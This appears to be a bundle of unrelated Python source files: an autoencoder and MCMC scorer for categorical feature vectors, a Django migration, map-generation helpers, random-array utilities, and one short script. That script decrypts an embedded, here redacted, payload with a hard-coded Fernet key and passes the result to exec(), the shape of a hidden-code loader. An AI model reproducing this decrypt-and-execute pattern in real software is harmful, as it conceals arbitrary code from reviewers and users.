def sigmoid(x):
    """Elementwise logistic function 1 / (1 + e^{-x})."""
    neg_exp = np.exp(-x)
    return 1.0 / (1.0 + neg_exp)
def softmax(x):
    """Softmax over axis 0 for vectors, or row-wise for 2-D arrays."""
    shifted = np.exp(x - np.max(x))  # prevent overflow
    if shifted.ndim == 1:
        return shifted / np.sum(shifted, axis=0)
    # ndim = 2: divide each row by its own sum (column vector via .T).
    row_sums = np.array([np.sum(shifted, axis=1)]).T
    return shifted / row_sums
class BinaryFeatureList(object):
    """Wraps a language-structure dict as attributes; its 'binvect'
    entry is coerced to an int32 NumPy array.

    Python 2 code (dict.iteritems). Assumes *lang_struct* contains a
    'binvect' key — TODO confirm against callers."""
    def __init__(self, lang_struct):
        # Expose every dict entry as an instance attribute.
        for k,v in lang_struct.iteritems():
            setattr(self, k, v)
        self.binvect = np.array(self.binvect, dtype=np.int32)
class CategoricalFeatureList(object):
    """Categorical feature vector with optional missing values.

    Negative entries in *mv_catvect* mark missing values; they are
    randomly initialised and remembered in self.mv_list so they can be
    re-sampled later."""
    def __init__(self, mv_catvect, evaluator, has_missing_values=True, fid_freq=None):
        self.evaluator = evaluator
        self.orig = mv_catvect
        self.catvect = np.copy(self.orig)
        self.mv_list = []
        self.has_missing_values = has_missing_values
        if self.has_missing_values:
            # randomly initialize missing values
            for fid, v in enumerate(self.orig):
                if v < 0: # missing value
                    self.mv_list.append(fid)
                    if fid_freq:
                        # NOTE(review): rand_partition is not defined or
                        # imported in this module's visible code —
                        # confirm where it comes from.
                        v = rand_partition(fid_freq[fid])
                    else:
                        size = self.evaluator.map_cat2bin[fid,1]
                        v = np.random.randint(0, size)
                    self.catvect[fid] = v
        self.binvect = self.evaluator.cat2bin(self.catvect)

    def propose_mv_constrained(self, fid=-1):
        """Propose a new value for one missing feature (a random one
        when fid < 0); returns copies (binvect2, catvect2) with exactly
        one category changed."""
        catvect2 = np.copy(self.catvect)
        binvect2 = np.copy(self.binvect)
        if fid < 0:
            fid = np.random.random_integers(0, high=len(self.mv_list) - 1) # inclusive
        old_v = catvect2[fid]
        bidx, size = self.evaluator.map_cat2bin[fid]
        # Draw from size-1 candidates and shift past the old value so
        # the proposal always differs from the current one.
        new_v = np.random.random_integers(0, high=size - 2)
        if new_v >= old_v:
            new_v += 1
        catvect2[fid] = new_v
        binvect2[bidx + old_v] = 0
        binvect2[bidx + new_v] = 1
        return (binvect2, catvect2)
class BaseEvaluator(object):
    """Autoencoder-based scorer over binary feature vectors.

    Holds tied encoder/decoder weights (We/Wd), biases (be/bd) and a
    scoring vector Ws, together with their AdaGrad accumulators (g*).
    Python 2 code (xrange). Training updates use AdaGrad with optional
    L1/L2 regularization."""
    def __init__(self, binsize, dims=50, eta=0.01, _lambda=0.001, penalty=None):
        self.binsize = binsize
        self.dims = dims
        # (weight name, AdaGrad accumulator name) pairs updated by
        # update_weight.
        self.weight_list = [("We", "gWe"), ("be", "gbe"), ("Wd", "gWd"), ("bd", "gbd"), ("Ws", "gWs")]
        # init_e = 0.01 / self.binsize
        init_e = 4 * np.sqrt(6.0 / (self.binsize + self.dims)) # per DeepLearning tutorial
        self.We = np.random.uniform(-init_e, init_e, (self.dims, self.binsize)) # encode
        self.be = np.random.uniform(-init_e, init_e, self.dims)
        # self.Wd = np.random.uniform(-init_e, init_e, (self.binsize, self.dims)) # decode
        self.Wd = self.We.T # tied weight
        self.bd = np.random.uniform(-init_e, init_e, self.binsize)
        self.Ws = np.random.uniform(-init_e, init_e, self.dims) # evaluation
        # AdaGrad accumulators start at a tiny epsilon to avoid division
        # by zero.
        self.gWe = 1e-45 * np.ones((self.dims, self.binsize))
        self.gbe = 1e-45 * np.ones(self.dims)
        self.gWd = 1e-45 * np.ones((self.binsize, self.dims))
        self.gbd = 1e-45 * np.ones(self.binsize)
        self.gWs = 1e-45 * np.ones(self.dims)
        # SGD-related params
        self.penalty = penalty
        self.scale = 1.0
        self.eta = eta
        self.eta_start = eta
        self._lambda = _lambda # L2 regularization term
        self.time = 1

    def update_weight(self, delta):
        """Apply an AdaGrad step for every weight present in *delta*;
        returns the summed absolute parameter change."""
        cdiff = 0.0
        # update weights using AdaGrad
        for _type, _gtype in self.weight_list:
            if _type not in delta:
                continue
            diff = self.scale * delta[_type]
            if np.fabs(diff).sum() < 1E-100: # fail-safe
                continue
            W = getattr(self, _type)
            G = getattr(self, _gtype)
            G += diff * diff
            S = np.sqrt(G)
            if self.penalty is None or self._lambda <= 0.0:
                # without regularization
                udiff = self.eta * diff / S
                W += udiff
                cdiff += np.fabs(udiff).sum()
            elif self.penalty == 'l2':
                # L2 regularization
                denom = self.eta * self._lambda + S
                uterm = self.eta * (diff / denom)
                W *= (S / denom)
                W += uterm
                # ignore the shrinkage term
                cdiff += np.fabs(uterm).sum()
                # sys.stderr.write("%f\n" % (np.fabs(self.eta * diff / np.sqrt(G)).sum() - np.fabs(uterm).sum()))
            else:
                # L1 regularization
                g = diff / S
                a = W + self.eta * g
                W2 = np.sign(a) * np.maximum(np.fabs(a) - self._lambda * g, 0.0)
                setattr(self, _type, W2)
                cdiff += self.eta * np.fabs(g).sum() # approximate
        self.time += 1
        # if self.time % 100 == 0:
        #     # self.scale /= 1.0 + self._lambda # self._lambda * self.eta
        #     # self.eta /= 1.0 + (10.0 / self.time)
        #     if self.eta < self.eta_start * 0.0001:
        #         self.eta = self.eta_start * 0.0001
        return cdiff

    def encode(self, binvect):
        """Map a binary vector to its hidden representation."""
        # sigmoid
        return sigmoid(self.scale * (np.dot(self.We, binvect) + self.be))
        # # tanh
        # return np.tanh(self.scale * (np.dot(self.We, binvect) + self.be))
        # # linear
        # return self.scale * (np.dot(self.We, binvect) + self.be)

    def decode(self, hvect):
        """Reconstruct a binary-vector estimate from hidden units."""
        # sigmoid
        return sigmoid(self.scale * (np.dot(self.Wd, hvect) + self.bd))
        # # tanh
        # return np.tanh(self.scale * (np.dot(self.Wd, hvect) + self.bd))
        # # linear
        # return self.scale * (np.dot(self.Wd, hvect) + self.bd)

    def calc_score(self, hvect):
        """Scalar evaluation score of a hidden vector."""
        return self.scale * np.dot(self.Ws, hvect)

    def calc_delta_autoencoder(self, binvect, delta=None, count=1.0):
        """Accumulate reconstruction-error gradients into *delta*;
        returns (delta, squared reconstruction error / 2)."""
        if delta is None:
            delta = {
                "We": np.zeros((self.dims, self.binsize)),
                "be": np.zeros(self.dims),
            }
        if "Wd" not in delta:
            delta["Wd"] = np.zeros((self.binsize, self.dims))
            delta["bd"] = np.zeros(self.binsize)
        hvect = self.encode(binvect)
        binvect2 = self.decode(hvect)
        # TODO: softmax (1-of-K constraints)-based error
        # cross-entropy (sigmoid)
        error2 = binvect - binvect2
        delta["Wd"] += count * np.outer(error2, hvect)
        delta["bd"] += count * error2
        # Backpropagate through the (sigmoid) hidden layer.
        error3 = self.scale * np.dot(self.Wd.T, error2)
        error4 = error3 * (hvect * (1.0 - hvect)) # sigmoid
        # error4 = error3 * (1.0 - hvect * hvect) # tanh
        # error4 = error3 # linear
        delta["We"] += count * np.outer(error4, binvect)
        delta["be"] += count * error4
        return (delta, np.dot(error2, error2) / 2)

    def calc_delta_scorer(self, binvect, hvect, delta=None, count=1.0):
        """Accumulate score gradients (w.r.t. Ws, We, be) into *delta*."""
        if delta is None:
            delta = {
                "We": np.zeros((self.dims, self.binsize)),
                "be": np.zeros(self.dims),
            }
        if "Ws" not in delta:
            delta["Ws"] = np.zeros(self.dims)
        delta["Ws"] += count * hvect
        error = self.scale * self.Ws * (hvect * (1.0 - hvect)) # sigmoid
        # error = self.scale * self.Ws * (1.0 - hvect * hvect) # tanh
        # error = self.scale * self.Ws # linear
        delta["We"] += count * np.outer(error, binvect)
        delta["be"] += count * error
        return delta

    def _calc_partition_function(self, burn_in=100, interval=10, samples=100, initial=None):
        """Estimate log Z by Metropolis sampling of unconstrained binary
        vectors; caches the estimate on self.logZ."""
        # # we ommit the N term because it causes underflow
        # if self.logZ is not None and np.random.uniform(0.0, 1.0) > 0.01:
        #     return self.logZ
        if initial is None:
            current = np.random.random_integers(0, 1, size=self.binsize)
        else:
            current = initial
        current_hvect = self.encode(current)
        current_score = self.calc_score(current_hvect)
        score_vect = np.empty(samples)
        for _iter in xrange(burn_in):
            current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
        score_vect[0] = current_score
        for _iter1 in xrange(samples - 1):
            for _iter2 in xrange(0, interval):
                current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
            score_vect[_iter1 + 1] = current_score
        # log-sum-exp with max subtracted for numerical stability.
        m = np.max(score_vect)
        self.logZ = np.log(np.exp(score_vect - m).sum()) + m - np.log(samples)
        return self.logZ

    def _sample_unconstrained(self, current, current_hvect, current_score):
        """One Metropolis step: propose a single-bit flip and accept it
        with probability proportional to exp(score difference)."""
        proposed = self._propose_unconstrained(current)
        proposed_hvect = self.encode(proposed)
        proposed_score = self.calc_score(proposed_hvect)
        e = np.exp([current_score, proposed_score] - np.max([current_score, proposed_score]))
        if e[0] < np.random.uniform(0.0, e.sum()):
            # accepted
            return (proposed, proposed_hvect, proposed_score, True)
        else:
            return (current, current_hvect, current_score, False)

    def _propose_unconstrained(self, binvect, do_copy=True):
        """Flip one uniformly chosen bit (on a copy unless do_copy is
        False)."""
        if do_copy:
            binvect = np.copy(binvect)
        fid = np.random.random_integers(0, high=self.binsize-1)
        binvect[fid] = 1 if binvect[fid] == 0 else 0
        return binvect
class NestedEvaluator(object):
    """Mixin adding a second hidden layer (Wh/bh, size dims2) between
    the encoder and the scoring vector Ws.

    Designed to be combined with BaseEvaluator: it reads self.binsize,
    self.dims, self.scale and self.weight_list, which this class does
    not define itself — confirm the concrete subclass provides them."""
    def init_nested(self, binsize, dims=50, dims2=10):
        # super(NestedEvaluator, self).__init__(binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty)
        self.dims2 = dims2
        self.weight_list.append(("Wh", "gWh"))
        self.weight_list.append(("bh", "gbh"))
        init_e = 4 * np.sqrt(6.0 / (self.binsize + self.dims)) # per DeepLearning tutorial
        # Ws is re-shaped to act on the second hidden layer.
        self.Ws = np.random.uniform(-init_e, init_e, self.dims2)
        self.Wh = np.random.uniform(-init_e, init_e, (self.dims2, self.dims))
        self.bh = np.random.uniform(-init_e, init_e, self.dims2)
        self.gWs = 1e-45 * np.ones(self.dims2)
        self.gWh = 1e-45 * np.ones((self.dims2, self.dims))
        self.gbh = 1e-45 * np.ones(self.dims2)

    def calc_score(self, hvect):
        """Score via the extra sigmoid layer: Ws . sigmoid(Wh h + bh)."""
        return self.scale * np.dot(self.Ws, sigmoid(self.scale * (np.dot(self.Wh, hvect) + self.bh)))

    def calc_delta_scorer(self, binvect, hvect, delta=None, count=1.0):
        """Accumulate score gradients (Ws, Wh, bh, We, be) into *delta*,
        backpropagating through both sigmoid layers."""
        if delta is None:
            delta = {
                "We": np.zeros((self.dims, self.binsize)),
                "be": np.zeros(self.dims),
            }
        if "Ws" not in delta:
            delta["Ws"] = np.zeros(self.dims2)
            delta["Wh"] = np.zeros((self.dims2, self.dims))
            delta["bh"] = np.zeros(self.dims2)
        hvect2 = sigmoid(self.scale * (np.dot(self.Wh, hvect) + self.bh))
        delta["Ws"] += count * hvect2
        # error = self.scale * self.Ws * (1.0 - hvect2 * hvect2) # tanh
        error = self.scale * self.Ws * (hvect2 * (1.0 - hvect2)) # sigmoid
        # error = self.scale * self.Ws # linear
        delta["Wh"] += count * np.outer(error, hvect)
        delta["bh"] += count * error
        error2 = self.scale * np.dot(self.Wh.T, error) * (hvect * (1.0 - hvect))
        delta["We"] += count * np.outer(error2, binvect)
        delta["be"] += count * error2
        return delta
class BinaryFeatureListEvaluator(BaseEvaluator):
    """Evaluator over unconstrained binary feature vectors, trained with
    MCMC negative sampling."""
    def __init__(self, binsize, dims=50, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
        if is_empty:
            # placeholder instance; attributes are filled in by _numpy()
            return
        super(BinaryFeatureListEvaluator, self).__init__(binsize=binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty)
        self.logZ = None
    def set_freqvect(self, freqvect):
        # for frequency-based initialization
        self.freqvect = freqvect
    def _denumpy(self):
        """Return a JSON-serializable dict of the model state; weights are
        multiplied by self.scale on the way out."""
        obj = {
            "_class": type(self).__name__,
            "dims": self.dims,
            "binsize": self.binsize,
            "weight_list": self.weight_list,
        }
        if hasattr(self, "freqvect"):
            obj["freqvect"] = self.freqvect.tolist()
        for _type, _gtype in self.weight_list:
            obj[_type] = (self.scale * getattr(self, _type)).tolist()
        return obj
    def dumps(self):
        """Serialize the model to a JSON string."""
        return json.dumps(self._denumpy())
    @classmethod
    def loads(self, dat):
        """Deserialize a model; dispatches on the stored "_class" name so
        subclasses round-trip correctly."""
        struct = json.loads(dat)
        return globals()[struct["_class"]]._numpy(struct)
    @classmethod
    def _numpy(self, struct):
        """Rebuild a model instance from a parsed JSON dict."""
        if "_class" in struct:
            obj = globals()[struct["_class"]](None, is_empty=True)
        else:
            # backward-compatibility
            obj = BinaryFeatureListEvaluator(None, is_empty=True)
        obj.dims = struct["dims"]
        obj.binsize = struct["binsize"]
        obj.scale = 1.0
        obj.weight_list = struct["weight_list"]
        for _type, _gtype in obj.weight_list:
            setattr(obj, _type, np.array(struct[_type]))
        if "freqvect" in struct:
            obj.freqvect = np.array(struct["freqvect"])
        return obj
    def binarize(self, binvect2):
        """Threshold a real-valued vector at 0.5 into a 0/1 int32 vector."""
        # normalize
        binvect = np.zeros(self.binsize, dtype=np.int32)
        for i,v in enumerate(binvect2):
            if v >= 0.5:
                binvect[i] = 1
            else:
                binvect[i] = 0
        return binvect
    def init_rand_binvect(self):
        """Draw a random binary start state, biased by self.freqvect when a
        frequency vector has been supplied."""
        if hasattr(self, "freqvect"):
            # "- 0" coerces the boolean array to integers
            return np.greater(self.freqvect, np.random.rand(self.binsize)) - 0
        else:
            r = np.random.random_integers(1, 500) # control the frequency of 0-valued elements
            return np.random.random_integers(0, r, size=self.binsize) / r
    def train_scorer(self, tnode, burn_in=100, interval=10, psamples=100, nsamples=100, Cscore=1.0, delta=None):
        """Accumulate one training node's gradient contribution into `delta`
        using two MCMC negative-sample sources plus the positive sample."""
        # 2 types of negative samples
        #
        # 1. samples from around positive samples
        # 2. samples from a long-lasting MCMC chain
        # 1. samples from around positive samples
        current = tnode.binvect
        current_hvect = self.encode(current)
        current_score = self.calc_score(current_hvect)
        # calc the expected count
        for _iter1 in xrange(nsamples):
            for _iter2 in xrange(0, interval):
                current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
            delta = self.calc_delta_scorer(current, current_hvect, delta=delta, count=-Cscore / (2 * nsamples))
        # 2. samples from a long-lasting MCMC chain
        # (occasionally restarted at random so the chain cannot get stuck)
        if not hasattr(tnode, "rand_binvect") or np.random.uniform(0.0, 1.0) < 0.00005:
            sys.stderr.write("reset rand binvect\n")
            tnode.rand_binvect = self.init_rand_binvect()
        rand_hvect = self.encode(tnode.rand_binvect)
        rand_score = self.calc_score(rand_hvect)
        for _iter1 in xrange(nsamples):
            for _iter2 in xrange(0, interval):
                tnode.rand_binvect, rand_hvect, rand_score, is_accepted = self._sample_unconstrained(tnode.rand_binvect, rand_hvect, rand_score)
            delta = self.calc_delta_scorer(tnode.rand_binvect, rand_hvect, delta=delta, count=-Cscore / (2 * nsamples))
        # calc the expected count (positive term: the training sample itself)
        current_hvect = self.encode(tnode.binvect)
        current_score = self.calc_score(current_hvect)
        delta = self.calc_delta_scorer(tnode.binvect, current_hvect, delta=delta, count=Cscore)
        return delta
class NestedBinaryFeatureListEvaluator(NestedEvaluator, BinaryFeatureListEvaluator):
    """BinaryFeatureListEvaluator with the two-layer scoring head supplied
    by the NestedEvaluator mixin (listed first so its scoring methods win
    in the MRO)."""
    def __init__(self, binsize, dims=50, dims2=10, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
        if is_empty:
            return
        super(NestedBinaryFeatureListEvaluator, self).__init__(binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty, is_empty=is_empty)
        self.init_nested(binsize, dims=dims, dims2=dims2)
        self.logZ = None
    def _denumpy(self):
        # extend the base serialization with the nested layer size
        obj = BinaryFeatureListEvaluator._denumpy(self)
        obj["dims2"] = self.dims2
        return obj
    @classmethod
    def _numpy(self, struct):
        # restore the nested layer size on top of the base deserialization
        obj = BinaryFeatureListEvaluator._numpy(self, struct)
        obj.dims2 = struct["dims2"]
        return obj
class CategoricalFeatureListEvaluator(BaseEvaluator):
    """Evaluator over binary vectors that encode categorical features in a
    one-hot-per-category layout.

    map_cat2bin[fid] holds (offset, size) of category fid's one-hot segment
    inside the binary vector; map_bin2cat[idx] holds the inverse (fid, value)
    pair for binary position idx.
    """
    def __init__(self, fid2struct, dims=50, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
        if is_empty:
            # placeholder instance; attributes are filled in by _numpy()
            return
        self.fid2struct = fid2struct
        self.catsize = len(fid2struct)
        binsize = 0
        self.map_cat2bin = np.empty((self.catsize, 2), dtype=np.int32) # (first elem. idx, size)
        for fid, fnode in enumerate(fid2struct):
            size = len(fnode["vid2label"])
            self.map_cat2bin[fid] = [binsize, size]
            binsize += size
        BaseEvaluator.__init__(self, binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty)
        self.map_bin2cat = np.empty((self.binsize, 2), dtype=np.int32) # (fid, idx)
        idx = 0
        for fid, fnode in enumerate(fid2struct):
            for v, flabel in enumerate(fnode["vid2label"]):
                self.map_bin2cat[idx] = [fid, v]
                idx += 1
        self.logZ = None
    def _denumpy(self):
        """Return a JSON-serializable dict of the model state; weights are
        multiplied by self.scale on the way out."""
        obj = {
            "_class": type(self).__name__,
            "dims": self.dims,
            "catsize": self.catsize,
            "binsize": self.binsize,
            "map_cat2bin": self.map_cat2bin.tolist(),
            "map_bin2cat": self.map_bin2cat.tolist(),
            "fid2struct": self.fid2struct,
            "weight_list": self.weight_list,
        }
        for _type, _gtype in self.weight_list:
            obj[_type] = (self.scale * getattr(self, _type)).tolist()
        return obj
    def dumps(self):
        """Serialize the model to a JSON string."""
        return json.dumps(self._denumpy())
    @classmethod
    def loads(self, dat):
        """Deserialize a model from a JSON string produced by dumps()."""
        struct = json.loads(dat)
        return self._numpy(struct)
    @classmethod
    def _numpy(self, struct):
        """Rebuild a model instance from a parsed JSON dict."""
        if "_class" in struct:
            obj = globals()[struct["_class"]](None, is_empty=True)
        else:
            # backward-compatibility
            obj = CategoricalFeatureListEvaluator(None, is_empty=True)
        obj.dims = struct["dims"]
        obj.catsize = struct["catsize"]
        obj.binsize = struct["binsize"]
        obj.map_cat2bin = np.array(struct["map_cat2bin"], dtype=np.int32)
        obj.map_bin2cat = np.array(struct["map_bin2cat"], dtype=np.int32)
        obj.fid2struct = struct["fid2struct"]
        obj.scale = 1.0
        obj.weight_list = struct["weight_list"]
        for _type, _gtype in obj.weight_list:
            setattr(obj, _type, np.array(struct[_type]))
        return obj
    def binarize(self, binvect2):
        """Project a real-valued vector onto valid one-hot segments by taking
        the argmax inside each category's block."""
        binvect = np.zeros(self.binsize, dtype=np.int32)
        for fid in xrange(self.catsize):
            boffset, bsize = self.map_cat2bin[fid]
            bidx = boffset + np.argmax(binvect2[boffset:boffset+bsize])
            binvect[bidx] = 1
        return binvect
    def train_scorer(self, tnode, burn_in=100, interval=10, psamples=100, nsamples=100, Cscore=1.0, delta=None):
        """Accumulate one training node's gradient contribution into `delta`.

        Two active negative-sample sources, both of which respect the
        one-hot categorical constraints:
          - samples from around the positive sample
          - samples from a long-lasting MCMC chain
        The unconstrained variants of both were disabled (dead code removed),
        but the negative weights still divide by 4 rather than 2 -- behavior
        preserved as-is.
        """
        # negative samples from around the positive sample
        current_catvect = tnode.catvect
        current_binvect = tnode.binvect
        current_hvect = self.encode(current_binvect)
        current_score = self.calc_score(current_hvect)
        # calc the expected count
        for _iter1 in xrange(nsamples):
            for _iter2 in xrange(0, interval):
                current_score, current_catvect, current_binvect, current_hvect, is_accepted = \
                    self._sample_all_constrained(current_catvect, current_binvect, current_hvect, current_score)
            delta = self.calc_delta_scorer(current_binvect, current_hvect, delta=delta, count=-Cscore / (4 * nsamples))
        # random MCMC with categorical constraints
        # (occasionally restarted at random so the chain cannot get stuck)
        if not hasattr(tnode, "randnode") or np.random.uniform(0.0, 1.0) < 0.0001:
            sys.stderr.write("reset randnode\n")
            tnode.randnode = CategoricalFeatureList(-1 * np.ones(self.catsize, dtype=np.int32), self)
        rand_binvect = tnode.randnode.binvect
        rand_hvect = self.encode(rand_binvect)
        rand_score = self.calc_score(rand_hvect)
        for _iter1 in xrange(nsamples):
            for _iter2 in xrange(0, interval):
                rand_score, tnode.randnode.catvect, tnode.randnode.binvect, rand_hvect, is_accepted = \
                    self._sample_all_constrained(tnode.randnode.catvect, tnode.randnode.binvect, rand_hvect, rand_score)
            delta = self.calc_delta_scorer(tnode.randnode.binvect, rand_hvect, delta=delta, count=-Cscore / (4 * nsamples))
        # positive term: the training sample itself
        current_hvect = self.encode(tnode.binvect)
        current_score = self.calc_score(current_hvect)
        if tnode.has_missing_values:
            # average the positive term over sampled completions of the
            # missing values
            for _iter1 in xrange(psamples - 1):
                for _iter2 in xrange(0, interval):
                    # BUGFIX: was "curent_hvect", which left current_hvect
                    # stale so the delta below paired the updated
                    # tnode.binvect with an outdated hidden vector.
                    current_score, current_hvect, is_accepted = self._sample_mv_constrained(tnode, current_hvect, current_score)
                delta = self.calc_delta_scorer(tnode.binvect, current_hvect, delta=delta, count=Cscore / psamples)
            # NOTE(review): only psamples-1 completions are accumulated, so
            # the positive term sums to Cscore*(psamples-1)/psamples --
            # confirm this is intended.
        else:
            delta = self.calc_delta_scorer(tnode.binvect, current_hvect, delta=delta, count=Cscore)
        return delta
    def _sample_all_constrained(self, current_catvect, current_binvect, current_hvect, current_score):
        """One Metropolis transition that keeps every category one-hot."""
        proposed_catvect, proposed_binvect = self._propose_all_constrained(current_catvect, current_binvect)
        proposed_hvect = self.encode(proposed_binvect)
        proposed_score = self.calc_score(proposed_hvect)
        # max-subtraction keeps the exponentials from overflowing
        e = np.exp([current_score, proposed_score] - np.max([current_score, proposed_score]))
        if e[0] < np.random.uniform(0.0, e.sum()):
            # accepted
            return (proposed_score, proposed_catvect, proposed_binvect, proposed_hvect, True)
        else:
            return (current_score, current_catvect, current_binvect, current_hvect, False)
    def _propose_all_constrained(self, catvect, binvect):
        """Propose a neighbour by re-assigning one uniformly chosen category
        to a different value, updating both representations."""
        catvect2 = np.copy(catvect)
        binvect2 = np.copy(binvect)
        fid = np.random.random_integers(0, high=self.catsize - 1)
        old_v = catvect2[fid]
        bidx, size = self.map_cat2bin[fid]
        # draw from the size-1 values other than old_v
        new_v = np.random.random_integers(0, high=size - 2)
        if new_v >= old_v:
            new_v += 1
        catvect2[fid] = new_v
        binvect2[bidx + old_v] = 0
        binvect2[bidx + new_v] = 1
        return (catvect2, binvect2)
    def _sample_mv_constrained(self, tnode, current_hvect, current_score, fid=-1):
        """One Metropolis transition over completions of tnode's missing
        values; on acceptance tnode's vectors are updated in place."""
        binvect2, catvect2 = tnode.propose_mv_constrained(fid=fid)
        proposed_hvect = self.encode(binvect2)
        proposed_score = self.calc_score(proposed_hvect)
        e = np.exp([current_score, proposed_score] - np.max([current_score, proposed_score]))
        if e[0] < np.random.uniform(0.0, e.sum()):
            # accepted
            tnode.binvect = binvect2
            tnode.catvect = catvect2
            return (proposed_score, proposed_hvect, True)
        else:
            return (current_score, current_hvect, False)
    def cat2bin(self, catvect):
        """Expand a category-value vector into its one-hot binary form."""
        # # -1 or 1, not 0 or 1
        # binvect = -1 * np.ones(self.binsize, dtype=np.int32)
        binvect = np.zeros(self.binsize, dtype=np.int32)
        for fid, v in enumerate(catvect):
            if v < 0:
                raise Exception("negative value in category vector: %d" % v)
            if v >= self.map_cat2bin[fid][1]:
                raise Exception("out-of-range error in category vector: %d" % v)
            binvect[self.map_cat2bin[fid][0] + v] = 1
        return binvect
    def bin2cat(self, binvect):
        """Collapse a one-hot binary vector back into category values;
        categories with no set bit come back as -1."""
        catvect = -1 * np.ones(self.catsize, dtype=np.int32)
        for idx, v in enumerate(binvect):
            if v:
                s = self.map_bin2cat[idx]
                catvect[s[0]] = s[1]
        return catvect
class NestedCategoricalFeatureListEvaluator(NestedEvaluator, CategoricalFeatureListEvaluator):
    """CategoricalFeatureListEvaluator with the two-layer scoring head
    supplied by the NestedEvaluator mixin."""
    def __init__(self, fid2struct, dims=50, dims2=10, eta=0.01, _lambda=0.001, penalty=None, is_empty=False):
        if is_empty:
            return
        self.fid2struct = fid2struct
        self.catsize = len(fid2struct)
        binsize = 0
        self.map_cat2bin = np.empty((self.catsize, 2), dtype=np.int32) # (first elem. idx, size)
        for fid, fnode in enumerate(fid2struct):
            size = len(fnode["vid2label"])
            self.map_cat2bin[fid] = [binsize, size]
            binsize += size
        super(NestedCategoricalFeatureListEvaluator, self).__init__(fid2struct, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty, is_empty=is_empty)
        self.init_nested(binsize, dims=dims, dims2=dims2)
        self.map_bin2cat = np.empty((self.binsize, 2), dtype=np.int32) # (fid, idx)
        idx = 0
        for fid, fnode in enumerate(fid2struct):
            for v, flabel in enumerate(fnode["vid2label"]):
                self.map_bin2cat[idx] = [fid, v]
                idx += 1
        self.logZ = None
    def _denumpy(self):
        # extend the base serialization with the nested layer size
        obj = CategoricalFeatureListEvaluator._denumpy(self)
        obj["dims2"] = self.dims2
        return obj
    @classmethod
    def _numpy(self, struct):
        # restore the nested layer size on top of the base deserialization
        obj = CategoricalFeatureListEvaluator._numpy(self, struct)
        obj.dims2 = struct["dims2"]
        return obj
| StarcoderdataPython |
4923212 | <filename>saleor/payment/migrations/0014_django_price_2.py
# Generated by Django 2.2.4 on 2019-08-19 10:50
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Resize the `currency` columns of Payment and Transaction to the
    project-wide currency-code length setting."""

    dependencies = [("payment", "0013_auto_20190813_0735")]

    # Both models get the identical field change, so the operations are
    # generated from one template.
    operations = [
        migrations.AlterField(
            model_name=model_name,
            name="currency",
            field=models.CharField(max_length=settings.DEFAULT_CURRENCY_CODE_LENGTH),
        )
        for model_name in ("payment", "transaction")
    ]
| StarcoderdataPython |
12805309 | <gh_stars>10-100
from . import plasma
# ******************
# *** PREPPERS ***
# ******************
#
# Before map generation proper takes place, the grid must be prepared.
# Generally this will involve setting a terrain for the floor of each tile
# and setting the wall values to True. Note that "True" is not a valid terrain
# type- it will be converted to proper walls later on in the generation process.
#
# The prepper may also set the map generator's plasma attribute.
class BasicPrep(object):
    """Prepper that floods the entire map area: every tile gets the given
    base floor terrain, and walls start out solid everywhere (to be carved
    away by later generation stages)."""
    def __init__(self, terr):
        self.terr = terr
    def __call__(self, mapgen):
        # Delegate the flood-fill to the map generator itself.
        mapgen.fill(mapgen.gb, mapgen.area, floor=self.terr, wall=True)
class HeightfieldPrep(object):
    """Prepper that lays down three terrain bands (low / medium / high)
    from a freshly generated plasma heightfield."""
    def __init__(self, loterr, medterr, hiterr, loground=0.2, higround=0.7, maxloground=0.3, maxhiground=0.5):
        self.loterr = loterr
        self.medterr = medterr
        self.hiterr = hiterr
        self.loground = loground
        self.higround = higround
        self.maxloground = maxloground
        self.maxhiground = maxhiground
    def __call__(self, mapgen):
        mapgen.plasma = plasma.Plasma(map_width=mapgen.area.w, map_height=mapgen.area.h)
        # Flatten the in-bounds plasma cells and sort them so the cutoff
        # adjustments below can be read off as quantiles.
        heights = sorted(
            value
            for column in mapgen.plasma.map[:mapgen.width]
            for value in column[:mapgen.height]
        )
        # Clamp the low/high cutoffs against the maxloground/maxhiground
        # quantiles so the terrain bands keep sensible proportions; note
        # these updates persist on the instance between calls.
        self.loground = min(self.loground, heights[int(len(heights) * self.maxloground)])
        self.higround = max(self.higround, heights[int(len(heights) * self.maxhiground)])
        for x in range(mapgen.width):
            for y in range(mapgen.height):
                tile = mapgen.gb._map[x][y]
                height = mapgen.plasma.map[x][y]
                if height < self.loground:
                    # low ground: open floor, no wall
                    tile.floor = self.loterr
                elif height < self.higround:
                    tile.floor = self.medterr
                    tile.wall = True
                else:
                    tile.floor = self.hiterr
                    tile.wall = True
| StarcoderdataPython |
4960259 | <gh_stars>1-10
import numpy as np
def complex_random(sh):
    """Return a complex array of shape *sh* whose real and imaginary parts
    are drawn independently from the uniform distribution on [0, 1)."""
    real_part = np.random.rand(*sh)
    imag_part = np.random.rand(*sh)
    return real_part + 1j * imag_part
def float_random(sh):
    """Return a float array of shape *sh* drawn uniformly from [0, 1)."""
    # random_sample with an explicit shape tuple is the documented
    # equivalent of np.random.rand(*sh).
    return np.random.random_sample(tuple(sh))
| StarcoderdataPython |
5175211 | import base64
from cryptography.fernet import Fernet
# SECURITY NOTE(review): this script decrypts an embedded ciphertext and then
# exec()s the resulting plaintext, which hands full interpreter control to
# whatever the payload contains -- a classic loader/malware pattern.  Never
# run it on an untrusted payload.
# NOTE(review): the payload literal below was redacted to '<KEY' and its
# closing quote is missing, so this file no longer parses as written.
payload = b'<KEY>
# Hard-coded 32-character ASCII passphrase used as the raw key material.
key_str = 'correctstaplecorrectstaplecorrec'
# Fernet requires a base64 encoding of a 32-byte key, so the passphrase is
# base64-encoded to satisfy that format.
key_base64 = base64.b64encode(key_str.encode())
f = Fernet(key_base64)
plain = f.decrypt(payload)
# Executes the decrypted code directly in this interpreter.
exec(plain.decode())
| StarcoderdataPython |
86860 | <reponame>LichenZeng/AlphaZero_Gomoku
# -*- coding: utf-8 -*-
"""
